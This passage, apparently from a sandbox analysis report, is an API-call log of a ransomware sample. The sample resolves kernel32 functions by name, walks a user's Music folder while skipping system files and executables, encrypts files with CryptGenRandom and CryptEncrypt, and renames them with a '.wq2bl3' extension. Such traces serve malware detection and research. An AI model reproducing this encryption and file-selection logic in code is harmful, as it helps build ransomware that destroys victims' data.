lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.761] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.761] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.761] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.762] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.762] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.762] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.762] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.762] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.762] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.762] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.762] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.762] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.762] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.762] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.762] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.762] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.762] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.762] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.762] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.762] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.762] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.762] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.763] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.763] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.763] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.763] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.763] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.763] lstrlenA (lpString="DELETEATOM") returned 10 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.763] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.763] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.763] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.763] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.763] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.763] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.763] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.763] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.763] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.763] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.763] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.763] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.763] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.764] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.764] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.764] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.764] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.764] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.764] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.764] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.764] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.764] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.764] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.764] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.764] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.764] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.764] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.764] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.764] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.764] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.764] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.764] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.765] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.765] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.765] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.765] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.765] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.765] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.765] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.765] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.765] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.765] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.765] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.765] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a") returned 78 [0085.765] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a.wq2bl3") returned 85 [0085.765] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\i8_b4k3dpmodg.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\i8_B4K3DPMoDG.m4a.wq2bl3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\i8_b4k3dpmodg.m4a.wq2bl3"), dwFlags=0x0) returned 1 [0085.766] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.767] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.767] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.767] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf43c9e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.767] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.768] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.768] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.768] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.768] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.768] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.768] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.768] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.768] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.768] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\jkbimi8.tmp" [0085.768] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.768] CloseHandle (hObject=0x0) returned 0 [0085.768] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.768] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe5656b0, ftCreationTime.dwHighDateTime=0x1d4cd3c, ftLastAccessTime.dwLowDateTime=0x78dcd7a0, ftLastAccessTime.dwHighDateTime=0x1d4ce33, ftLastWriteTime.dwLowDateTime=0x78dcd7a0, ftLastWriteTime.dwHighDateTime=0x1d4ce33, nFileSizeHigh=0x0, nFileSizeLow=0xbf51, dwReserved0=0x0, dwReserved1=0x0, cFileName="MculZic-sh 2UCGOPTG.mp3", cAlternateFileName="MCULZI~1.MP3")) returned 1 [0085.768] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.768] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="autorun.inf") returned 1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="boot.ini") returned 1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="desktop.ini") returned 1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="ntuser.dat") returned -1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="iconcache.db") returned 1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="bootsect.bak") returned 1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="ntuser.dat.log") returned -1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="thumbs.db") returned -1 [0085.769] lstrcmpiW (lpString1="MculZic-sh 2UCGOPTG.mp3", lpString2="Bootfont.bin") returned 1 [0085.769] lstrlenW (lpString="MculZic-sh 2UCGOPTG.mp3") returned 23 [0085.769] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.769] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.769] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.769] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.769] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.769] lstrlenW (lpString="MculZic-sh 2UCGOPTG.mp3") returned 23 [0085.769] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="MculZic-sh 2UCGOPTG.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3" [0085.769] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.769] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\mculzic-sh 2ucgoptg.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.769] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=48977) returned 1 [0085.769] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.769] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.770] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.770] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.770] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.770] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.770] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.771] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.771] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.772] CloseHandle (hObject=0x43c) returned 1 [0085.772] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.772] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.773] CloseHandle (hObject=0x0) returned 0 [0085.773] CloseHandle (hObject=0x438) returned 1 [0085.773] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.774] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.774] GetTickCount () returned 0x114de5e [0085.774] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.774] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.774] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.775] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.775] lstrlenA (lpString="kernel32.dll") returned 12 [0085.775] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.775] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.775] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.775] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.775] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.775] lstrlenA (lpString="ADDATOMA") returned 8 [0085.775] lstrcpyA 